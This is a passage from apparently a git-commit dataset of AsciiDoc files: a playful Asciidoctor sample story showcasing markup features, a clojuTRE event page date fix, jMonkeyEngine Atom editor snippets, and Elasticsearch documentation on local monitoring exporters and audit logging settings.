Chronicles.\n:description: This story chronicles the inexplicable hazards and vicious beasts a \\\nteam must conquer and vanquish on their journey to discovering open source's true \\\npower.\n:doctype: book\n\/\/ Settings:\n:experimental:\n:icons: font\n:listing-caption: Listing\n:sectnums:\n:toc:\n:toclevels: 3\nifdef::backend-pdf[]\n:title-logo-image: image:sample-banner.svg[pdfwidth=4.25in,align=center]\n:source-highlighter: rouge\n\/\/:rouge-style: github\n\/\/:source-highlighter: pygments\n\/\/:pygments-style: tango\nendif::[]\n\/\/ URIs:\n:wolper-uri: http:\/\/en.wikipedia.org\/wiki\/Wolpertinger\n\n[abstract]\n{description}\n\n== It's a City Under Siege\n\nThis journey begins one late Monday afternoon at http:\/\/www.devoxx.be[Devoxx].\nOur team needs coffee, _desperately_, but none of us dare open the theater doors...\n\nDuring the first workshop, a script-happy warlock inadvertently released a legion of Wolpertingers!\nTo leave now would mean *code dismemberment and certain death*.\n\nBehold -> the horror!\n\n.Wolpertinger, stuffed\n[.left.thumb]\nimage::wolpertinger.jpg[Wolpertinger,pdfwidth=50%,link=http:\/\/en.wikipedia.org\/wiki\/Wolpertinger]\n\nYou may not be familiar with these {wolper-uri}[ravenous beasts].\nTrust us, they'll eat your shorts and suck loops from your code.\nIn light of this danger, we've searched high and wide for the security crew's defensive operations manual.\nWe can't find it and the DefOps{empty}footnote:[a portmanteau of \u201cdefensive\u201d and \u201coperations\u201d] werewolves haven't returned from their rendezvous at Bier Central.\nThey've either eaten each other or fallen victim to the Wolpertingers roaming the streets of Antwerp.\nQuick, hit kbd:[Ctrl,Alt,Backspace] or select menu:File[Quit] and let's bail out of here!\n\nWARNING: Working with werewolves leads to howling and trying to train aggressive regular expressions with Pavlovian reinforcement.\n\n_Weak light from the hallway trickled across the theater, chased by a distant scream._\n\n=== Rendezvous Point\n\nCome on, _Bier Central_.\nDid you have to ask?\nIf you beat me there, I'll take a 
http:\/\/www.sintbernardus.be\/stbernardusabt12.php?l=en[St. Bernardus Abt 12].\n\n[#ravages]\n== The Ravages of Writing\n\nCrystalline XML tags relentlessly bombarded the theater.\n\n.XML tags\n[source,xml]\n----\n<author id=\"1\">\n <personname>\n <firstname>Lazarus<\/firstname>\n <surname>het Draeke<\/surname>\n <\/personname>\n<\/author>\n----\n\nDespite the assault, we were still attempting to draft an example of a defensive operation.\n\n.DefOps Plan\n====\nClick btn:[Download Zip] to download the defensive operation plan bundle.\n\nOMG!\nSomebody please save us now!\nI want my mum...and an extra-large double macchiato, please.\n====\n\nUnfortunaly, Lazarus and I had both come to the conclusion that we weren't going to get out of this without corrupted hardrives if we didn't locate caffeine within the next few hours.\n\n=== A Recipe for Potion That Will Ensure You Win the Hearts of Developers\n\nThis potion for a sample document contains the following ingredients, which are listed in a very random, chaotically nested order.\n\n.Ingredients for Potion that Demystifies Documents\n* all the headings\n** syntax highlighted source code\n*** non-syntax highlighted source code or just a listing block\n* quote block\n** verse block\n*** table with some cell formatting\n**** sequential paragraphs\n***** admonition blocks, but use them sparingly\n*** bullet list with nesting\n** numbered list with nesting\n** definition list\n*** sidebar\n* example block\n** block image (no inline images)\n*** inline formatting in a paragraph\n**** two fresh Burdockian leaves\n***** They must be harvested by the light of the teal moons.\n\nAre you square?\n\n[square]\n* one\n* two\n* three\n\nWhat is there to do?\n\n* [x] Done\n* [ ] Next\n* Who's counting?\n\n==== Searching for Burdockian\n\n.Steps for finding and preparing Burdockian leaves\n. Locate dusty botany\n.. Sneeze\n... Sneeze some more\n. Find section on Burdockian\n.. Review its characteristics\n... Take a picture of the diagram of its leaves\n.... Don't rip out the picture like a troglodyte\n..... Don't do it, I'm watching you\n. Put on your hiking boots\n. Freeze your butt off on the side of a mountain at midnight\n\nLet's skip a few steps and start counting from 10.\n\n[start=10]\n. arabic (10)\n.. loweralpha (a)\n... lowerroman (i)\n... lowerroman (ii)\n... lowerroman (iii)\n... lowerroman (iv)\n.... upperalpha (A)\n. arabic (11)\n\nIt's time for a top 5 list, made using the `reversed` option on an ordered list!\n\n[%reversed]\n. Stone Imperial Russian Stout\n. Pliny the Elder\n. Chimay Grande R\u00e9serve (Blue)\n. St. Bernardus Abt 12\n. 
Westvleteren 12 (XII)\n\nHow about a list with some terms?\n\n* Fruits\n\nApple::\nThe round fruit of a tree of the rose family, which typically has thin red or green skin and crisp flesh.\nYes, I said _flesh_.\n\nPear::\nA yellowish- or brownish-green edible fruit that is typically narrow at the stalk and wider toward the base, with sweet, slightly gritty flesh.\nMore flesh.\nMmmmm.\n\n* Vegetables\n\nCarrot::\nAn orange-colored root eaten as a vegetable.\nBeware, it's a favorite of the Wolpertinger.\n\n===== Are You Still Here?\n\n.Move, move, move!\n[CAUTION]\n====\nThe Wolpertingers can smell your procrastination.\nIt's not their fault you can't find your boots.\n====\n\n====== Sigh...\n\nTIP: Your boots are in your closet.\n\n== Dawn on the Plateau\n\nLazarus was hanging from the bottom limb of a Burdockian tree, licking the bark.\n\n[quote,Mark Tobey]\nOn pavements and the bark of trees I have found whole worlds.\n\n\"`If there are whole worlds on that bark, he just swallowed them,`\" Kizmet replied.\n\n[verse,The documentation attorneys]\n____\nNo bark was harmed in the making of this potion.\n We're not so sure about a couple ants though.\n\n Nor those worlds...\n\n Crap, I smell an injunction.\n____\n\nWe'd retrieved the leaves, but we'd obviously lost our minds in the process.\n\n[verse]\nRoses are +++<span style=\"color: #FF0000\">red<\/span>+++.\nViolets are +++<span style=\"color: #0000FF\">blue<\/span>+++__-ish__.\n\n== Words Seasoned with Power\n\n_To tame_ the wild wolpertingers we needed to build a *charm*.\nBut **u**ltimate victory could only be won if we divined the *_true name_* of the __war__lock.\n\n\"`What kind of charm?`\" Lazarus asked. \"`An odoriferous one or a mineral one?`\"\nKizmet shrugged. \"`The note from Olaf's desk says '`wormwood and licorice,`' but these could be normal groceries for werewolves.`\"\n\n\"`Well the H~2~O written on the security whiteboard could be part of a shopping list, but I don't think the local bodega also sells e = mc^2^,`\" Lazarus replied.\n\n\"`Wait!`\" Indigo plucked a small vial from her desk's top drawer and held it toward us.\nThe vial's label read '```e = mc^2^ *_the scent of science_* _smells like a genius_```'.\n\n=== Can I Get Some `Code`?\n\n[%hardbreaks]\nSure.\nHave a listing block.\n\n----\nThis is an example of a listing block.\nThe content inside is rendered as <pre> text.\n----\n\nBut I'm not giving you any highlighting shazam just yet.\n\n.What is a listing block?\n****\nLike literal blocks, the content in listing blocks is displayed exactly as you entered it.\nListing block content is rendered as `<pre>` text.\n\nThe `listing` style is applied to an element, such as a paragraph, by setting the `listing` attribute on that element.\n****\n\nLet's get our highlighting on!\n\n<<<\n\nInstall Prawn:\n\n $ gem install prawn\n\nThen create your first PDF document in Ruby!\n\n.Generates a basic PDF document using Prawn\n```ruby\nrequire 'prawn' # <1>\n\nPrawn::Document.generate 'output.pdf' do # <3>\n text 'Hello, World!' # <2>\nend\n```\n<1> Imports Prawn library\n<2> Adds text \u201cHello, World!\u201d to first page\n<3> Writes PDF to [file]_output.pdf_ after executing all statements\n\nHow about some source code that styles code? 
So meta!\n\n```css\ncode {\n padding: 2px 4px;\n font-size: 90%;\n color: #c7254e;\n white-space: nowrap !important;\n background-color: #f9f2f4;\n border-radius: 4px;\n}\n```\n\nWhere could we go without some Java?\nNaturally, some autosizing is necessary.\n\n[source%autofit,java]\n----\npackage org.javaee7.cdi.events;\n\nimport javax.annotation.PostConstruct;\nimport javax.enterprise.context.SessionScoped;\nimport javax.enterprise.event.Observes;\nimport java.io.Serializable;\nimport java.util.ArrayList;\nimport java.util.Collections;\nimport java.util.List;\nimport javax.ws.rs.*;\n\n\/**\n * This session-scoped bean receives greeting strings from the event bus\n * and provides access to the collection of these greetings via a REST API.\n *\n * @author The Duke\n * @since 1.0\n *\/\n@SessionScoped\npublic class GreetingReceiver implements EventReceiver, Serializable {\n\n private List<String> greetings;\n\n @PostConstruct\n void init() {\n this.greetings = new ArrayList<String>();\n }\n\n void receive(@Observes String greet) {\n this.greetings.add(greet);\n }\n\n @GET\n @Produces(\"application\/json\")\n public List<String> listAll(@QueryParam(\"start\") Integer start, @QueryParam(\"max\") Integer max) {\n int numGreetings = this.greetings.size();\n\n if (numGreetings == 0 || max == 0) {\n return Collections.<String>emptyList();\n }\n\n if (start == null) {\n start = 0;\n }\n\n if (max == null) {\n max = numGreetings;\n }\n\n return this.greetings.subList(start, Math.min(max + start, numGreetings));\n }\n\n}\n----\n\nWe already showed you an XML example in <<ravages>>.\n\nI'll trade you a little table for some of that bark.\n\n[cols=3,frame=topbot,grid=rows]\n|===\n|Name of Column 1 |Name of Column 2 |Name of Column 3\n\n^m|Prefix the `{vbar}` with `{caret}` to center content horizontally\n.<|Prefix the `{vbar}` with a `.` and `<` to align the content to the top of the cell\n>|Prefix the `{vbar}` with `>` to align the content to the right horizontally\n\n3+^.^e|This content spans all three columns (`3{plus}`) and is centered both horizontally (`{caret}`) and vertically (`.{caret}`) within the cell.\n|===\n\nWait.\nWhat?\nWhere is this story going?\n\n`<span>`:: an html tag that makes me crazy\n\nalign:: something I never get going in the right direction.\nAlso has to do with my poor verbal communication skills\n\nfloat::\nstyle::\ndon't make me laugh\n\nDoes anyone have the time?\n\nTg lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.\nUt enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.\nDuis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.\nExcepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborumj.\n\n== Keeping It Together\n\nOn this page we have nested \"`keep together`\" logic.\nThe combined block will be shifted to the next page if there isn't room available on this one.\n\n[verse]\nFirst,\nwe\nneed\nto\nwaste\nseveral\nlines\nusing\na\nverse\nto\npush\nthe\nnext\nblock\nto\nits\nbreaking\npoint.\n\n[NOTE]\n.What happens if there is both a field and a method with the same name?\n====\nBack to the previous example, suppose that we have both a field and a method with the same name, as in:\n\n.Java class with a field and method that share the same name\n[source,java]\n----\npublic class Foo {\n public String bar;\n\n public String bar() {\n return bar;\n 
}\n}\n----\n\n*Golo resolves methods first, fields last.*\nHence, the following Golo code will resolve the `bar()` method, not the `bar` field:\n\n.Golo picks the method over the field with the same name\n[source,golo]\n----\nlet foo = Foo()\n\nfoo: bar(\"baz\") # <1>\n\nprintln(foo: bar()) # <2>\n----\n<1> Writes the field\n<2> Calls the `bar()` method\n====\n\n<<<\n\nHere's a preview of how each heading level is rendered.\n\n[discrete]\n= Heading 1 (Level 0)\n\nfiller content\n\n[discrete]\n== Heading 2 (Level 1)\n\nfiller content\n\n[discrete]\n=== Heading 3 (Level 2)\n\nfiller content\n\n[discrete]\n==== Heading 4 (Level 3)\n\nfiller content\n\n[discrete]\n===== Heading 5 (Level 4)\n\nfiller content\n\n[discrete]\n====== Heading 6 (Level 5)\n\nfiller content\n\n---\n\n--\nHere's some content inside an open block.\n--\n\n[appendix]\n== Credits\n\n.Brought to you with icon:heart[] by OpenDevise\n[%header%footer,cols=\"2,2s,3\",grid=rows,frame=topbot,width=75%,caption=]\n|===\n|Name\n|Title\n|Alias\n\n|Sarah White\n|President\n|http:\/\/twitter.com\/carbonfray[@carbonfray]\n\n|Dan Allen\n|Vice President\n|http:\/\/twitter.com\/mojavelinux[@mojavelinux]\n\n3+^.e|Powered by Open Source\n|===\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"7df3acd7217e17f7ee1214e967907d963fd0d42a","subject":"Fix type on Clojutre start date","message":"Fix type on Clojutre start date\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2017\/clojutre.adoc","new_file":"content\/events\/2017\/clojutre.adoc","new_contents":"= clojuTRE\nclojuTRE\n2017-09-02\n:jbake-type: event\n:jbake-edition: 2017\n:jbake-link: http:\/\/clojutre.org\/2017\/\n:jbake-location: Tampere, Finland\n:jbake-start: 2017-09-02\n:jbake-end: 2017-09-02\n\nclojuTRE is a Clojure conference organized by http:\/\/www.metosin.fi\/[Metosin]. The event has single track, late start, short talks (20 minutes and 5 minutes Q&A) and a funky after party for networking, discussions and draft beer. We welcome both newbies and seasoned Clojurists.\n\n\n","old_contents":"= clojuTRE\nclojuTRE\n2017-09-02\n:jbake-type: event\n:jbake-edition: 2017\n:jbake-link: http:\/\/clojutre.org\/2017\/\n:jbake-location: Tampere, Finland\n:jbake-start: 2017-09-92\n:jbake-end: 2017-09-02\n\nclojuTRE is a free Clojure conference organized by http:\/\/www.metosin.fi\/[Metosin]. The event has single track, late start, short talks (20 minutes and 5 minutes Q&A) and a funky after party for networking, discussions and draft beer. We welcome both newbies and seasoned Clojurists.\n\n\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"16f8a9b94067be7b979de8f4af4ebafab12aaeeb","subject":"updated snippets","message":"updated snippets\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/ROOT\/pages\/wiki\/atom_snippets.adoc","new_file":"docs\/modules\/ROOT\/pages\/wiki\/atom_snippets.adoc","new_contents":"# Your snippets\n#\n# Atom snippets allow you to enter a simple prefix in the editor and hit tab to\n# expand the prefix into a larger code block with templated values.\n#\n# You can create a new snippet in this file by typing \"snip\" and then hitting\n# tab.\n#\n# An example CoffeeScript snippet to expand log to console.log:\n#\n# '.source.coffee':\n# 'Console log':\n# 'prefix': 'log'\n# 'body': 'console.log $1'\n#\n# Each scope (e.g. 
'.source.coffee' above) can only be declared once.\n#\n# This file uses CoffeeScript Object Notation (CSON).\n# If you are unfamiliar with CSON, you can read more about it in the\n# Atom Flight Manual:\n# http:\/\/flight-manual.atom.io\/using-atom\/sections\/basic-customization\/#_cson\n'.source.asciidoc':\n 'Cross Reference Inter-Doc':\n 'prefix': 'xrefI'\n 'body': '<<${1:path\/to\/wiki\/page}#,${2:custom label text}>>'\n 'Cross Reference Module':\n 'prefix': 'xrefM'\n 'body': 'xref:${1:target-page-filename}.adoc[${2:link text}]'\n 'Cross Reference ROOT':\n 'prefix': 'xrefR'\n 'body': 'xref:ROOT:${1:target-page-filename}.adoc[${2:link text}]'\n 'Admonition Block':\n 'prefix': 'admonB'\n 'body': \"\"\"\n [${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}]\n ====\n $6\n ====\n $7\n \"\"\"\n 'Admonition Block with Title':\n 'prefix': 'admonBwT'\n 'body': \"\"\"\n [${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}]\n .${6:Optional Title}\n ====\n $7\n ====\n $8\n \"\"\"\n 'Admonition Paragraph':\n 'prefix': 'admonP'\n 'body': \"\"\"\n ${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}: $6\n \"\"\"\n 'Admonition Paragraph with Title':\n 'prefix': 'admonPwT'\n 'body': \"\"\"\n .${1:Optional Title}\n ${2:NOTE}${3:TIP}${4:IMPORTANT}${5:CAUTION}${6:WARNING}: $7\n \"\"\"\n","old_contents":"= Atom Snippets Page\n:author: mitm\n:revnumber: 2\n:revdate: 2017-09-08T23:24:11.262Z\n:relfileprefix: ..\/\n:imagesdir: ..\n:experimental:\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nEdit this file to add snippets to the snippets.cson file for the\nlink:https:\/\/atom.io\/[Atom editor]. To use these snippets just copy and paste\nthe text below into your snippets.cson file.\n\n[source]\n----\n# Your snippets\n#\n# Atom snippets allow you to enter a simple prefix in the editor and hit tab to\n# expand the prefix into a larger code block with templated values.\n#\n# You can create a new snippet in this file by typing \"snip\" and then hitting\n# tab.\n#\n# An example CoffeeScript snippet to expand log to console.log:\n#\n# '.source.coffee':\n# 'Console log':\n# 'prefix': 'log'\n# 'body': 'console.log $1'\n#\n# Each scope (e.g. 
'.source.coffee' above) can only be declared once.\n#\n# This file uses CoffeeScript Object Notation (CSON).\n# If you are unfamiliar with CSON, you can read more about it in the\n# Atom Flight Manual:\n# http:\/\/flight-manual.atom.io\/using-atom\/sections\/basic-customization\/#_cson\n'.source.asciidoc':\n 'Inter-Doc Cross Reference':\n 'prefix': 'xref'\n 'body': '<<${1:path\/to\/wiki\/page}#,${2:custom label text}>>'\n 'Admonition Block':\n 'prefix': 'admonB'\n 'body': \"\"\"\n [${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}]\n ====\n $6\n ====\n $7\n \"\"\"\n 'Admonition Block with Title':\n 'prefix': 'admonBwT'\n 'body': \"\"\"\n [${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}]\n .${6:Optional Title}\n ====\n $7\n ====\n $8\n \"\"\"\n 'Admonition Paragraph':\n 'prefix': 'admonP'\n 'body': \"\"\"\n ${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}: $6\n \"\"\"\n 'Admonition Paragraph with Title':\n 'prefix': 'admonPwT'\n 'body': \"\"\"\n .${1:Optional Title}\n ${2:NOTE}${3:TIP}${4:IMPORTANT}${5:CAUTION}${6:WARNING}: $7\n \"\"\"\n----\n\n== Snippets Explained\n\n[cols=\"10, 45,45\"*,options=\"header\"]\n|===\n\n| Prefix\n| Inserted Syntax\n| Description\n\n| xref\n|`+<<path\/to\/wiki\/page#,custom label text>>+`\n| Inserts an `Inter-Document Cross Reference`.\n\n| admonB\n| [NOTETIPIMPORTANTCAUTIONWARNING] +\n ==== +\n ====\n| Inserts an `Admonition Block` with the #NOTE# style highlighted. Use the kbd:[Tab] key to cycle to the next style\nand kbd:[Backspace] off any unwanted style as you go. The final kbd:[Tab] will take you into the block.\n\n| admonBwT\n| [NOTETIPIMPORTANTCAUTIONWARNING] +\n.Optional Title +\n ==== +\n ====\n| Inserts an `Admonition Block` with title.\n\n\n| admonP\n| NOTETIPIMPORTANTCAUTIONWARNING:\n| Inserts an `Admonition Paragraph` with the #NOTE# style highlighted. Use the kbd:[Tab] key to cycle to the next style\nand kbd:[Backspace] off any unwanted style as you go. The final kbd:[Tab] will take you to the beginning of the paragraph.\n\n| admonPwT\n| .Optional Title +\nNOTETIPIMPORTANTCAUTIONWARNING:\n| Inserts an `Admonition Paragraph` with title.\n\n|===\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"523324c1c866b574a86056a5e35aba8195e433cb","subject":"Add info on how to disable cleaner service (#64655) (#66704)","message":"Add info on how to disable cleaner service (#64655) (#66704)\n\nCo-authored-by: James Rodewig <d5d520df3f4564540f208acb32a86e5e141e7431@users.noreply.github.com>\r\n\r\nCo-authored-by: Julien Guay <d252e019ad03df882bfd6f98f9fb6735823befe5@yahoo.fr>","repos":"GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/reference\/monitoring\/local-export.asciidoc","new_file":"docs\/reference\/monitoring\/local-export.asciidoc","new_contents":"[role=\"xpack\"]\n[testenv=\"basic\"]\n[[local-exporter]]\n=== Local exporters\n\n[IMPORTANT]\n=========================\n{metricbeat} is the recommended method for collecting and shipping monitoring\ndata to a monitoring cluster.\n\nIf you have previously configured legacy collection methods, you should migrate\nto using {metricbeat} collection methods. 
Use either {metricbeat} collection or\nlegacy collection methods; do not use both.\n\nLearn more about <<configuring-metricbeat>>.\n=========================\n\nThe `local` exporter is the default exporter in {monitoring}. It routes data\nback into the same (local) cluster. In other words, it uses the production\ncluster as the monitoring cluster. For example:\n\n[source,yaml]\n---------------------------------------------------\nxpack.monitoring.exporters.my_local_exporter: <1>\n type: local\n---------------------------------------------------\n<1> The exporter name uniquely defines the exporter, but it is otherwise unused.\n\nThis exporter exists to provide a convenient option when hardware is simply not\navailable. It is also a way for developers to get an idea of what their actions\ndo for pre-production clusters when they do not have the time or resources to\nprovide a separate monitoring cluster. However, this exporter has disadvantages\nthat impact the local cluster:\n\n* All indexing impacts the local cluster and the nodes that hold the monitoring\nindices' shards.\n* Most collectors run on the elected master node. Therefore most indexing occurs\nwith the elected master node as the coordinating node, which is a bad practice.\n* Any usage of {monitoring} for {kib} uses the local cluster's resources for\nsearches and aggregations, which means that they might not be available for\nnon-monitoring tasks.\n* If the local cluster goes down, the monitoring cluster has inherently gone\ndown with it (and vice versa), which generally defeats the purpose of monitoring.\n\nFor the `local` exporter, all setup occurs only on the elected master node. This\nmeans that if you do not see any monitoring templates or ingest pipelines, the\nelected master node is having issues or it is not configured in the same way.\nUnlike the `http` exporter, the `local` exporter has the advantage of accessing\nthe monitoring cluster's up-to-date cluster state. It can therefore always check\nthat the templates and ingest pipelines exist without a performance penalty. If\nthe elected master node encounters errors while trying to create the monitoring\nresources, it logs errors, ignores that collection, and tries again after the\nnext collection.\n\nThe elected master node is the only node to set up resources for the `local`\nexporter. Therefore all other nodes wait for the resources to be set up before\nindexing any monitoring data from their own collectors. Each of these nodes logs\na message indicating that they are waiting for the resources to be set up.\n\nOne benefit of the `local` exporter is that it lives within the cluster and\ntherefore no extra configuration is required when the cluster is secured with\n{stack} {security-features}. All operations, including indexing operations, that\noccur from a `local` exporter make use of the internal transport mechanisms\nwithin {es}. This behavior enables the exporter to be used without providing any\nuser credentials when {security-features} are enabled.\n\nFor more information about the configuration options for the `local` exporter,\nsee <<local-exporter-settings>>.\n\n[[local-exporter-cleaner]]\n==== Cleaner service\n\nOne feature of the `local` exporter, which is not present in the `http` exporter,\nis a cleaner service. The cleaner service runs once per day at 01:00 AM UTC on\nthe elected master node.\n\nThe role of the cleaner service is to clean, or curate, the monitoring indices\nthat are older than a configurable amount of time (the default is `7d`). 
This\ncleaner exists as part of the `local` exporter as a safety mechanism. The `http`\nexporter does not make use of it because it could enable a single misconfigured\nnode to prematurely curate data from other production clusters that share the\nsame monitoring cluster.\n\nIn a dedicated monitoring cluster, you can use the cleaner service without\nhaving to monitor the monitoring cluster itself. For example:\n\n[source,yaml]\n---------------------------------------------------\nxpack.monitoring.collection.enabled: false <1>\nxpack.monitoring.history.duration: 3d <2>\n---------------------------------------------------\n\n<1> Disables the collection of data on the monitoring cluster.\n<2> Lowers the default history duration from `7d` to `3d`. The minimum value is\n`1d`. This setting can be modified only when using a Gold or higher level\nlicense. For the Basic license level, it uses the default of 7 days.\n\nTo disable the cleaner service, add a disabled local exporter:\n\n[source,yaml]\n----\nxpack.monitoring.exporters.my_local.type: local <1>\nxpack.monitoring.exporters.my_local.enabled: false <2>\n----\n\n<1> Adds a local exporter named `my_local`\n<2> Disables the local exporter. This also disables the cleaner service.\n","old_contents":"[role=\"xpack\"]\n[testenv=\"basic\"]\n[[local-exporter]]\n=== Local exporters\n\n[IMPORTANT]\n=========================\n{metricbeat} is the recommended method for collecting and shipping monitoring\ndata to a monitoring cluster.\n\nIf you have previously configured legacy collection methods, you should migrate\nto using {metricbeat} collection methods. Use either {metricbeat} collection or\nlegacy collection methods; do not use both.\n\nLearn more about <<configuring-metricbeat>>.\n=========================\n\nThe `local` exporter is the default exporter in {monitoring}. It routes data\nback into the same (local) cluster. In other words, it uses the production\ncluster as the monitoring cluster. For example:\n\n[source,yaml]\n---------------------------------------------------\nxpack.monitoring.exporters.my_local_exporter: <1>\n type: local\n---------------------------------------------------\n<1> The exporter name uniquely defines the exporter, but it is otherwise unused.\n\nThis exporter exists to provide a convenient option when hardware is simply not\navailable. It is also a way for developers to get an idea of what their actions\ndo for pre-production clusters when they do not have the time or resources to\nprovide a separate monitoring cluster. However, this exporter has disadvantages\nthat impact the local cluster:\n\n* All indexing impacts the local cluster and the nodes that hold the monitoring\nindices' shards.\n* Most collectors run on the elected master node. Therefore most indexing occurs\nwith the elected master node as the coordinating node, which is a bad practice.\n* Any usage of {monitoring} for {kib} uses the local cluster's resources for\nsearches and aggregations, which means that they might not be available for\nnon-monitoring tasks.\n* If the local cluster goes down, the monitoring cluster has inherently gone\ndown with it (and vice versa), which generally defeats the purpose of monitoring.\n\nFor the `local` exporter, all setup occurs only on the elected master node. 
This\nmeans that if you do not see any monitoring templates or ingest pipelines, the\nelected master node is having issues or it is not configured in the same way.\nUnlike the `http` exporter, the `local` exporter has the advantage of accessing\nthe monitoring cluster's up-to-date cluster state. It can therefore always check\nthat the templates and ingest pipelines exist without a performance penalty. If\nthe elected master node encounters errors while trying to create the monitoring\nresources, it logs errors, ignores that collection, and tries again after the\nnext collection.\n\nThe elected master node is the only node to set up resources for the `local`\nexporter. Therefore all other nodes wait for the resources to be set up before\nindexing any monitoring data from their own collectors. Each of these nodes logs\na message indicating that they are waiting for the resources to be set up.\n\nOne benefit of the `local` exporter is that it lives within the cluster and\ntherefore no extra configuration is required when the cluster is secured with\n{stack} {security-features}. All operations, including indexing operations, that\noccur from a `local` exporter make use of the internal transport mechanisms\nwithin {es}. This behavior enables the exporter to be used without providing any\nuser credentials when {security-features} are enabled.\n\nFor more information about the configuration options for the `local` exporter,\nsee <<local-exporter-settings>>.\n\n[[local-exporter-cleaner]]\n==== Cleaner service\n\nOne feature of the `local` exporter, which is not present in the `http` exporter,\nis a cleaner service. The cleaner service runs once per day at 01:00 AM UTC on\nthe elected master node.\n\nThe role of the cleaner service is to clean, or curate, the monitoring indices\nthat are older than a configurable amount of time (the default is `7d`). This\ncleaner exists as part of the `local` exporter as a safety mechanism. The `http`\nexporter does not make use of it because it could enable a single misconfigured\nnode to prematurely curate data from other production clusters that share the\nsame monitoring cluster.\n\nIn a dedicated monitoring cluster, the cleaning service can be used without\nhaving to also monitor the monitoring cluster. For example:\n\n[source,yaml]\n---------------------------------------------------\nxpack.monitoring.collection.enabled: false <1>\nxpack.monitoring.history.duration: 3d <2>\n---------------------------------------------------\n<1> Disable the collection of data on the monitoring cluster.\n<2> Lower the default history duration from `7d` to `3d`. The minimum value is\n`1d`. This setting can be modified only when using a Gold or higher level\nlicense. For the Basic license level, it uses the default of 7 days.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0cd35543da189b2f2f9ea4a667dd85a8330089a1","subject":"DOCS Correct audit emit_node_id default value as false (#56995)","message":"DOCS Correct audit emit_node_id default value as false (#56995)\n\nSince version 7, the `xpack.security.audit.logfile.emit_node_id` setting defaults\r\nto `false`, yet the docs say otherwise. 
This commit fixes that.","repos":"robin13\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/reference\/settings\/audit-settings.asciidoc","new_file":"docs\/reference\/settings\/audit-settings.asciidoc","new_contents":"[role=\"xpack\"]\n[[auditing-settings]]\n=== Auditing security settings\n++++\n<titleabbrev>Auditing settings<\/titleabbrev>\n++++\n\nYou configure security auditing settings in the `elasticsearch.yml` configuration file\non each node in the cluster. For more information, see <<enable-audit-logging>>.\n\n[[general-audit-settings]]\n==== General Auditing Settings\n\n`xpack.security.audit.enabled`::\nSet to `true` to enable auditing on the node. The default value is `false`.\nThis puts the auditing events in a dedicated file named `<clustername>_audit.json`\non each node. \n\n[[event-audit-settings]]\n==== Audited Event Settings\n\nThe events and some other information about what gets logged can be controlled\nby using the following settings:\n\n`xpack.security.audit.logfile.events.include`::\nSpecifies which events to include in the auditing output. The default value is:\n`access_denied, access_granted, anonymous_access_denied, authentication_failed,\nconnection_denied, tampered_request, run_as_denied, run_as_granted`.\n\n`xpack.security.audit.logfile.events.exclude`::\nExcludes the specified events from the output. By default, no events are\nexcluded.\n\n`xpack.security.audit.logfile.events.emit_request_body`::\nSpecifies whether to include the request body from REST requests on certain\nevent types such as `authentication_failed`. The default value is `false`.\n+\n--\nIMPORTANT: No filtering is performed when auditing, so sensitive data may be\naudited in plain text when including the request body in audit events.\n--\n\n[[node-audit-settings]]\n==== Local Node Info Settings\n\n`xpack.security.audit.logfile.emit_node_name`::\nSpecifies whether to include the <<node.name,node name>> as a field in\neach audit event. The default value is `false`.\n\n`xpack.security.audit.logfile.emit_node_host_address`::\nSpecifies whether to include the node's IP address as a field in each audit event.\nThe default value is `false`.\n\n`xpack.security.audit.logfile.emit_node_host_name`::\nSpecifies whether to include the node's host name as a field in each audit event.\nThe default value is `false`.\n\n`xpack.security.audit.logfile.emit_node_id`::\nSpecifies whether to include the node id as a field in each audit event.\nThis is available for the new format only. 
